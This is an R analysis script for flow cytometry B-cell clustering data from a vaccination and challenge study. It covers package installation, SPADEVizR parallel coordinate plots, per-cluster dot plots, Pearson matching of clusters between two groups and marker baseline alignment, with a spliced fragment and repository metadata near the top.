write.table(Grouped_SheetFour, file = "Data for Scatter Plot Grouped.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
#data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
#transpose the data for ploting: rows become samples, columns become clusters
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
# Strip whitespace and dots-for-spaces so names match the transposed rownames.
# NOTE(review): trim() is not base R - it comes from an attached package
# (raster/gdata); the base equivalent is trimws(). Confirm which is loaded.
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
# NOTE(review): the match() lookup is commented out, so this assignment assumes
# group_data rows are in exactly the same order as the rows of data - verify,
# otherwise samples are labeled with the wrong group.
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
# Move the group column to the front.
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Grouped_Scatterplots", showWarnings = FALSE)
setwd("Grouped_Scatterplots")
# Fix the x-axis ordering of the experimental groups for the plots below.
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
# One dot plot per cluster column: dots per experimental group, a median line
# across groups, and interquartile-range error bars; one jpeg per cluster.
# NOTE(review): aes_string() and the fun.y/fun.ymin/fun.ymax arguments are
# deprecated in ggplot2 (>= 3.0 / >= 3.3; use aes(.data[[...]]) and
# fun/fun.min/fun.max). They still work with warnings - confirm the installed
# ggplot2 version before modernizing.
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
# Save one image per cluster, named after the column.
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
### Displays an heatmap representation summarizing phenotypes for the overall dataset
# heatmapViewer is a SPADEVizR function; 'results' is the Results object built above.
heatmapViewer(results)
####################################################################################################################################################################################
#################################################################################################################################################################################### | /SpadevizR-analysis/DR3 Grouped Day 51/B Cells (smaller K)/DR3 Day 51 B Cells R Script.R | permissive | reeves-lab/2020-Coxiella-Scientific-Reports | R | false | false | 53,591 | r | ####################################################
#### INSTALLATION OF ALL PACKAGES Below - do not need to repeat if already in library (Try running lines 16-19 first, if some packages missing revert to line 4-11):
####################################################
source("https://bioconductor.org/biocLite.R")
biocLite()
biocLite("FlowSOM")
install.packages("biocLite")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('devtools')
install.packages('Rcpp')
install.packages('biclust')
install.packages('data.table')
install.packages('diptest')
install.packages('evtree')
install.packages('ggdendro')
install.packages("ggfortify")
install.packages('ggplot2')
install.packages('gplots')
install.packages('gdata')
install.packages('ggrepel')
install.packages('ggRandomForests')
install.packages('gridExtra')
install.packages('gtable')
install.packages('gtools')
install.packages('igraph')
install.packages('MASS')
install.packages('packcircles')
install.packages('plyr')
install.packages("randomForestSRC")
install.packages('reshape2')
install.packages('pheatmap')
install.packages('readxl')
install.packages("raster")
install.packages('openxlsx')
install.packages('devtools')
library("devtools")
install_github('tchitchek-lab/SPADEVizR')
source("http://bioconductor.org/biocLite.R")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('edgeR')
biocLite("edgeR")
install.packages("bindrcpp")
install.packages("stringi")
install.packages("statmod")
###################################################
# Library the packages
###################################################
library("devtools")
library("FlowSOM")
library('Rcpp')
library("SPADEVizR")
library(statmod)
library("edgeR")
library(gplots)
library(RColorBrewer)
library(pheatmap)
library(readxl)
library(openxlsx)
library(data.table)
library(ggplot2)
library(raster)
####################################################
####################################################
source("utils.R") #Sources utils function for phenoviewer_modified
##################################################
# Parallel coordinate plots generated using SPADEvizR - FOR GROUP 1 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
PrimaryDirectory <- getwd()
Abundance <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 43 and 47 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:185,1:17])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2960,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### MODIFIED PHENOVIEWER SCRIPT FOR MORE ACCURATE PARALLEL PLOTS ###
phenoViewer_modified <- function(Results,
samples = NULL,
clusters = NULL,
markers = NULL,
show.mean = "both",
show.on_device = TRUE,
sort.markers = TRUE) {
### when testing the function, use the parameters inside the function and test line by line of code. Use statement below to test the function above
# Results=results
# samples = NULL
# clusters = "Cluster 10"
# markers = NULL
# show.mean = "only"
# show.on_device = TRUE
# sort.markers = TRUE
if (is.null(Results)) {
stop("Error in phenoViewer: 'Results' parameter can not be NULL")
} else if (class(Results)[1] != "Results") {
stop("Error in phenoViewer: 'Results' parameter must be a 'Results' object")
}
if(length(Results@marker.names) == 0){
stop("Error in phenoViewer: 'Results' object must contain phenotypes")
}
if (is.null(samples)) {
samples <- Results@sample.names
data <- Results@cluster.phenotypes
cluster.abundances <- Results@cluster.abundances
} else if (!all(samples %in% Results@sample.names)) {
stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
} else {
data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
}
data <- stats::na.omit(data)
if (is.null(clusters)) {
stop("Error in phenoViewer: 'clusters' parameter is required")
} else if (all(clusters %in% Results@cluster.names)) {
if (typeof(clusters) != "character") {
stop("Error in phenoViewer: 'clusters' parameter must be a character vector")
}
clusters <- unique(clusters)
clusters.select <- data[, "cluster"] %in% clusters
data <- data[clusters.select,]
cluster.abundances <- cluster.abundances[clusters,]
} else {
stop("Error in phenoViewer:\nUnknown clusters : ", paste(setdiff(unique(clusters), Results@cluster.names), collapse = " "))
}
data <- plyr::ddply(data, c("sample"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
if (is.null(markers)) {
markers <- Results@marker.names
} else if (all(markers %in% Results@marker.names)) {
markers <- unique(markers)
data <- data[, c("sample", markers)]
} else {
stop("Error in phenoViewer: Unknown markers :", paste(setdiff(unique(markers), Results@marker.names), collapse = " "))
}
if (show.mean != "none" && show.mean != "both" && show.mean != "only") {
stop("Error in phenoViewer: 'show.mean' parameter must contain only one of these : 'none', 'both' or 'only'")
}
if (!is.logical(show.on_device)) { stop("Error in phenoViewer: 'show.on_device' parameter must be a logical") }
data <- reshape2::melt(data, id = c("sample"), stringsAsFactors = FALSE)
colnames(data) <- c("samples", "marker", "value")
names.palette <- unique(Results@cluster.phenotypes$sample)
palette <- ggcolors(length(names.palette))
names(palette) <- names.palette
assignments <- Results@assignments
if (!is.null(assignments)) {
order <- unique(assignments$bc)
assignments <- assignments[samples, , drop = FALSE]
data$bc <- assignments[data$samples, "bc"]
order <- intersect(order, unique(assignments$bc))
data$bc <- factor(data$bc, levels = order)
names.palette <- unique(assignments$bc)
palette <- ggcolors(length(names.palette))
names(palette) <- names.palette
} else if (is.element("bc", colnames(assignments))) {
warning("Warning in phenoViewer: 'assignments' slot do not contain the column 'bc' in the provided 'Results' object. Consequently, the samples names will be used in remplacement")
} else {
warning("Warning in phenoViewer: 'assignments' slot in the provided 'Results' object is absent. Consequently, the samples names will be used in remplacement")
}
if(sort.markers==TRUE){
clustering.markers <- Results@clustering.markers
ordered.markers <- c(gtools::mixedsort(clustering.markers),gtools::mixedsort(setdiff(Results@marker.names, clustering.markers)))
bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
}else{
clustering.markers <- Results@clustering.markers
ordered.markers <- markers
bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
}
for (i in seq_len(nrow(data))) {
data[i, "lower.bound"] <- Results@bounds[1, as.character(data[i, "marker"])]
data[i, "upper.bound"] <- Results@bounds[2, as.character(data[i, "marker"])]
}
cells.number <- sum(colSums(cluster.abundances))
title <- paste("Pheno Viewer - cluster: ", paste0(clusters, collapse = ", "), " (", format(cells.number, big.mark = " "), " cells)", sep = "")
bounds <- as.numeric(row.names(Results@bounds))
subtitle <- paste0("Grey ribbon displays from ", (bounds[1] * 100), "% to ", (bounds[2] * 100), "% percentiles of the range expression")
max.value <- -1
min.value <- -1
max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
max.value <- max.value * (1 + sign(max.value) * 0.1)
min.value <- min.value * (1 - sign(min.value) * 0.1)
means <- plyr::ddply(data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(means) <- c("marker", "means")
data_means <- data.frame(marker = 0, means= 0, clusters = 0)
tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
for(i in tmp_clusters){
tmp_data<- Results@cluster.phenotypes
tmp_clusters.select <- tmp_data[, "cluster"] %in% i
tmp_data <- tmp_data[tmp_clusters.select,]
tmp_data <- plyr::ddply(tmp_data, c("sample"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
tmp_data <- reshape2::melt(tmp_data, id = c("sample"), stringsAsFactors = FALSE)
colnames(tmp_data) <- c("samples", "marker", "value")
tmp_means <- plyr::ddply(tmp_data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(tmp_means) <- c("marker", "means")
tmp_means$clusters = i
data_means = rbind(data_means, tmp_means)
}
data_means = data_means[-1, ]
# data_means$marker = substr(data_means$marker, 2, 100000)
#data_means = data_means[order(data_means$marker, decreasing = TRUE), ]
plot <- ggplot2::ggplot(data = data_means) +
ggplot2::ggtitle(bquote(atop(.(title), atop(italic(.(subtitle)), ""))))
plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
size = 0.5, #changes size of background lines
alpha = 1,
color = "#CCCCCC")+
ggplot2::scale_y_continuous(limits = c(min.value, max.value), breaks = round(seq(0, max.value, by = 1), 0)) +
ggplot2::theme_bw()
plot <- plot + ggplot2::geom_line(data = means,
ggplot2::aes_string(x = "marker", y = "means", group = 1),
#group = 1,
linetype = "solid",
size = 1,
color = "#FF6666")
plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = bold.markers, color = colored.markers)) +
ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
legend.key = ggplot2::element_blank(),
plot.title = ggplot2::element_text(hjust=0.5)) +
ggplot2::xlab("markers") +
ggplot2::ylab("marker expressions") +
ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
grid::grid.draw(plot)
invisible(plot)
}
dir.create("Group1_ClusterImages", showWarnings = FALSE)
setwd("Group1_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
#i=1
jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
width=2000,
height=1500,
res = 300)
phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
dev.off()
}
setwd(PrimaryDirectory)
####################################
# SCATTER PLOT GENERATOR (Group 1)
# Converts Sheet4 of the Group 1 workbook to per-sample cluster frequencies
# (% of each sample's total cells) and saves one dot plot per cluster.
###################################
GroupOne_SheetFour <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
write.table(GroupOne_SheetFour, file = "Data for Scatter Plot Group 1.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
# Re-read the exported table; hard-coded extent: 185 clusters x (1 name + 16 samples).
data <- read.table("Data for Scatter Plot Group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:185,1:17])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
# Normalize each sample column to percentages of its total cell count.
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
  for (j in 1:ncol(data)) {
    data[i,j] = data[i,j]/sum_counts_sample[j]*100
  }
}
# Transpose so rows = samples, columns = clusters, for plotting.
data <- t(data)
data <- as.data.frame(data)
# Attach the experimental group of each sample.
# NOTE(review): trim() is not base R — presumably gdata::trim or a helper
# defined earlier in this file; confirm it is in scope (base alternative: trimws).
group_data <- read.table("group assignment for group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
# NOTE(review): the match() is commented out, so this assumes group_data rows
# are in the same order as the rows (samples) of data — verify against caller.
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group1_Scatterplots", showWarnings = FALSE)
setwd("Group1_Scatterplots")
# Fixed display order of the four conditions on the x axis.
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
# One dot plot per cluster column: dots per sample, median line across groups,
# and an IQR (25th-75th percentile) error bar.
# NOTE(review): fun.y / fun.ymin / fun.ymax are deprecated since ggplot2 3.3
# (renamed fun / fun.min / fun.max); kept as-is for the ggplot2 version this
# script was written against.
for(i in 2:ncol(data)){
  scatter_plot <-
    ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
    geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
    stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
    stat_summary(
      fun.ymin = function(z) { quantile(z,0.25) },
      fun.ymax = function(z) { quantile(z,0.75) },
      fun.y = median,
      width = 0.2,
      geom = "errorbar") +
    theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
    theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
    theme(legend.position = "none")
  ggsave(scatter_plot,
         width = 20,
         height = 15,
         dpi = 300,
         filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
##################################################
# Parallel co-ordinate plots generated using SPADEvizR - FOR GROUP 2 DATA:
##################################################
### Imports Sheet 4 (abundances) and Sheet 2 (phenotypes) from the Group 2
### workbook - change the path/file name to point at the desired experiment.
Abundance <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformat for SPADEVizR - the hard-coded extents (151x16 abundances,
### 2265x37 phenotypes) must match the sheet dimensions of this experiment.
cluster.abundances <- as.data.frame(Abundance[1:151,1:16])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2265,1:37])
# Drop the third phenotype column (not used by importResultsFromTables).
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
# Export one phenotype image per Group 2 cluster (same scheme as Group 1).
dir.create("Group2_ClusterImages", showWarnings = FALSE)
setwd("Group2_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
  jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
       width=2000,
       height=1500,
       res = 300)
  phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
  dev.off()
}
setwd(PrimaryDirectory)
####################################
# SCATTER PLOT GENERATOR (Group 2)
# Mirror of the Group 1 section above: per-sample cluster frequencies (%)
# and one dot plot per cluster, for the Group 2 workbook.
###################################
GroupTwo_SheetFour <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
write.table(GroupTwo_SheetFour, file = "Data for Scatter Plot Group 2.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
# Re-read the exported table; hard-coded extent: 151 clusters x (1 name + 15 samples).
data <- read.table("Data for Scatter Plot Group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:151,1:16])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
# Normalize each sample column to percentages of its total cell count.
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
  for (j in 1:ncol(data)) {
    data[i,j] = data[i,j]/sum_counts_sample[j]*100
  }
}
# Transpose so rows = samples, columns = clusters, for plotting.
data <- t(data)
data <- as.data.frame(data)
# Attach the experimental group of each sample.
# NOTE(review): trim() is not base R — confirm it is in scope (see Group 1 section).
group_data <- read.table("group assignment for group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
# NOTE(review): assumes group_data rows are ordered like the samples in data;
# the safer match() variant is commented out.
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group2_Scatterplots", showWarnings = FALSE)
setwd("Group2_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
# One dot plot per cluster: dots per sample, median line, IQR error bar.
# NOTE(review): fun.y / fun.ymin / fun.ymax are deprecated in ggplot2 >= 3.3.
for(i in 2:ncol(data)){
  scatter_plot <-
    ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
    geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
    stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
    stat_summary(
      fun.ymin = function(z) { quantile(z,0.25) },
      fun.ymax = function(z) { quantile(z,0.75) },
      fun.y = median,
      width = 0.2,
      geom = "errorbar") +
    theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
    theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
    theme(legend.position = "none")
  ggsave(scatter_plot,
         width = 20,
         height = 15,
         dpi = 300,
         filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
#########################################################################################################################################################
#########################################################################################################################################################
#### Export Sheet1 of each group's workbook to tab-separated .txt files.
#### These files feed the Pearson-correlation cluster matching below.
### Group 1: sheet one contains all Vortex (clustering) output for that group.
GroupOne_SheetOne <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet1")
write.table(GroupOne_SheetOne, file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
### Group 2: same export for the second workbook.
GroupTwo_SheetOne <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet1")
write.table(GroupTwo_SheetOne, file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
###################################################
# Generates a list of matching clusters from group 1 and 2 based on pearson's correlation and count
###################################################
# Summarize a Vortex Sheet1 export into one row per cluster and (optionally)
# min-max rescale every column to [0, 1].
#
# experiment_name : prefix ("Grp1"/"Grp2") prepended to each cluster row name.
# experiment_file : tab-separated file with columns Cluster, Term (sample),
#                   Count, then the marker columns.
# rescale         : if TRUE, min-max rescale all columns except the appended
#                   raw-count copy "Count1".
#
# Returns a data.frame with row names "<experiment_name>_Cluster_<id>",
# the (possibly rescaled) Count + marker columns, and a raw "Count1" column.
rescale_to_0_1 <- function(experiment_name, experiment_file, rescale = TRUE){
  raw_table = read.delim(experiment_file, sep = "\t", stringsAsFactors = FALSE)
  # Strip the "X"/"X." prefixes read.delim adds to non-syntactic column names.
  colnames(raw_table) = gsub("X.", "", colnames(raw_table), fixed = TRUE)
  colnames(raw_table) = gsub("X", "", colnames(raw_table), fixed = TRUE)
  # Normalize cluster labels to the canonical "Cluster_<id>" form.
  raw_table$Cluster = gsub("Cluster", "", raw_table$Cluster, fixed = TRUE)
  raw_table$Cluster = gsub(" ", "", raw_table$Cluster, fixed = TRUE)
  raw_table$Cluster = paste("Cluster_", raw_table$Cluster, sep = "")
  # Sort by cluster then sample; the run-length aggregation loop below
  # RELIES on rows of the same cluster being contiguous.
  raw_table = raw_table[order(raw_table$Cluster, raw_table$Term, decreasing = FALSE),]
  # Sample and cluster inventories.
  samples = unique(raw_table$Term)
  nSample= length(samples)
  clusters = unique(raw_table$Cluster)
  nCluster = length(clusters)
  # Seed a one-row, all-zero table with the raw column names (minus "Term");
  # it is grown by rbind as clusters are finalized.
  mean_marker_total_cells = data.frame(tmp_name = 0)
  for(i in 1:(ncol(raw_table)-1)){
    mean_marker_total_cells = cbind(mean_marker_total_cells, 0)
  }
  colnames(mean_marker_total_cells) = colnames(raw_table)
  mean_marker_total_cells = mean_marker_total_cells[, colnames(mean_marker_total_cells)!= "Term"]
  # Number of raw rows (sample entries) seen for each cluster.
  cluster_count = rep(0,nCluster)
  # Run-length aggregation over the sorted rows:
  #   j indexes the current cluster in cluster_count,
  #   k indexes the output row being filled.
  # When a cluster's run ends (next row differs, or the table ends), write one
  # output row: column 1 = cluster name, column 2 = SUM of the count column,
  # remaining columns = MEAN of each marker over that cluster's rows.
  j = 1
  k = 1
  for(i in 1:nrow(raw_table)){
    if(i == nrow(raw_table)){
      # Last raw row: close out the final cluster, then stop.
      cluster_count[j] = cluster_count[j] + 1
      for(n in 1:ncol(mean_marker_total_cells)){
        if(n == 1){
          mean_marker_total_cells[k,n] = raw_table$Cluster[i]
        }
        if(n == 2){
          mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
        if(n > 2){
          mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
      }
      break()
    }
    if(raw_table$Cluster[i] == raw_table$Cluster[i+1]){
      # Still inside the same cluster's run.
      cluster_count[j] = cluster_count[j] + 1
    }else{
      # Run boundary: finalize this cluster's row and open a fresh zero row
      # for the next cluster.
      cluster_count[j] = cluster_count[j] + 1
      for(n in 1:ncol(mean_marker_total_cells)){
        if(n == 1){
          mean_marker_total_cells[k,n] = raw_table$Cluster[i]
        }
        if(n == 2){
          mean_marker_total_cells[k,n] = sum(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
        if(n > 2){
          mean_marker_total_cells[k,n] = mean(raw_table[(i-cluster_count[j]+1):i,n+1])
        }
      }
      mean_marker_total_cells = rbind(mean_marker_total_cells, 0)
      j = j + 1
      k = k + 1
    }
  }
  # Min-max rescale helper.
  # NOTE(review): yields NaN for a constant column (max == min) — confirm the
  # marker columns can never be constant across clusters.
  tmp_rescale <- function(x) (x-min(x))/(max(x) - min(x))
  tmp_mean_marker_total_cells = mean_marker_total_cells
  # Prefix cluster names with the experiment, move them to row names.
  tmp_mean_marker_total_cells$Cluster = paste(experiment_name,
                                              "_",
                                              tmp_mean_marker_total_cells$Cluster,
                                              sep = "")
  rownames(tmp_mean_marker_total_cells) = tmp_mean_marker_total_cells[,1]
  tmp_mean_marker_total_cells = tmp_mean_marker_total_cells[,-1]
  # Keep an unscaled copy of the counts in "Count1" (last column); the rescale
  # loop below stops one column short, so Count1 stays raw while Count and the
  # markers are rescaled.
  tmp_mean_marker_total_cells$Count1 = tmp_mean_marker_total_cells$Count
  if(rescale==TRUE){
    for(i in 1:(ncol(tmp_mean_marker_total_cells)-1)){
      tmp_mean_marker_total_cells[,i] = tmp_rescale(tmp_mean_marker_total_cells[,i])
    }
  }
  return(tmp_mean_marker_total_cells)
}
### Build the per-cluster summary tables for both experiments.
### Change the experiment_file names to match the reformatted Sheet1 exports
### used for SPADEVizR; all files must live in the working directory.
experiment1 <- rescale_to_0_1(
  experiment_name = "Grp1",
  experiment_file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt",
  rescale = TRUE
)
experiment2 <- rescale_to_0_1(
  experiment_name = "Grp2",
  experiment_file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt",
  rescale = TRUE
)
# The rescaled "Count" column stays in experiment1/experiment2 so matching can
# rank on it; drop the rescaled Count column instead if count-free matching is
# wanted, e.g. experiment1[, colnames(experiment1) != "Count"].
# Keep full copies (experiment*_1) that retain the raw "Count1" totals, then
# strip Count1 from the tables used for the correlation itself.
experiment1_1 <- experiment1
experiment2_1 <- experiment2
experiment1 <- experiment1[, colnames(experiment1) != "Count1"]
experiment2 <- experiment2[, colnames(experiment2) != "Count1"]
# Pairwise Pearson correlation between every Grp1 cluster profile and every
# Grp2 cluster profile (rows of the rescaled summary tables), carrying along
# each cluster's raw cell count from experiment*_1$Count1.
#
# Bug fix: the original grew the table with rbind() at the end of EVERY loop
# iteration, which (a) copied the whole data.frame each time (O(n^2)) and
# (b) left one spurious all-zero placeholder row (cor = 0) after the final
# iteration that was never removed and ended up in the exported CSV.
# The table is now preallocated to exactly nrow(experiment1) * nrow(experiment2)
# rows, so no trailing row exists.
#
# Column order matters: the code below this block reorders columns by position
# (c(1,2,5,6,3,4)), so keep clusters, counts, then cor/p.value.
n_pairs <- nrow(experiment1) * nrow(experiment2)
experiment1_experiment2_Pearson_correlation <- data.frame(
  experiment1_cluster = character(n_pairs),
  experiment2_cluster = character(n_pairs),
  experiment1_count   = numeric(n_pairs),
  experiment2_count   = numeric(n_pairs),
  cor                 = numeric(n_pairs),
  p.value             = numeric(n_pairs),
  stringsAsFactors = FALSE
)
t <- 1
for (i in seq_len(nrow(experiment1))) {
  for (j in seq_len(nrow(experiment2))) {
    # Correlate the two clusters' rescaled Count + marker profiles.
    pearson_statictis <- cor.test(as.numeric(experiment1[i, ]),
                                  as.numeric(experiment2[j, ]),
                                  method = "pearson")
    experiment1_experiment2_Pearson_correlation$experiment1_cluster[t] <- rownames(experiment1)[i]
    experiment1_experiment2_Pearson_correlation$experiment2_cluster[t] <- rownames(experiment2)[j]
    experiment1_experiment2_Pearson_correlation$cor[t]     <- pearson_statictis$estimate
    experiment1_experiment2_Pearson_correlation$p.value[t] <- pearson_statictis$p.value
    experiment1_experiment2_Pearson_correlation$experiment1_count[t] <- experiment1_1$Count1[i]
    experiment1_experiment2_Pearson_correlation$experiment2_count[t] <- experiment2_1$Count1[j]
    t <- t + 1
  }
}
# Reorder columns to: cluster pair, cor, p.value, then the two raw counts.
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[, c(1,2,5,6,3,4)]
# Sort best-matching cluster pairs (highest correlation) to the top.
experiment1_experiment2_Pearson_correlation = experiment1_experiment2_Pearson_correlation[
  order(experiment1_experiment2_Pearson_correlation$cor, decreasing = TRUE),]
# Inspect interactively.
View(experiment1_experiment2_Pearson_correlation)
# Persist the full pairwise correlation table for manual cluster matching.
write.csv(experiment1_experiment2_Pearson_correlation, "DR3 D51 B Cells Pearsons Coefficient.csv", row.names = FALSE)
####################################################################################################################################################################################
####################################################################################################################################################################################
setwd(PrimaryDirectory)
##################################################
## Matching script: combine the Group 1 and Group 2 cluster tables and align
## their marker baselines, producing grouped_file with all cluster information
## under experiment-prefixed names.
##################################################
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster <- paste0("Grp1_Cluster_", Grp1_data$Cluster)
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster <- paste0("Grp2_Cluster_", Grp2_data$Cluster)
### Marker columns occupy 4:37 — adjust this range when the panel size changes
### (e.g. 40 markers for Live cells, 35 for innate cells).
# Per marker, shift the higher-minimum group down by the difference of the two
# groups' minima so both batches share the same baseline.
for (marker_col in 4:37) {
  grp1_floor <- min(Grp1_data[, marker_col])
  grp2_floor <- min(Grp2_data[, marker_col])
  if (grp1_floor > grp2_floor) {
    Grp1_data[, marker_col] <- Grp1_data[, marker_col] - (grp1_floor - grp2_floor)
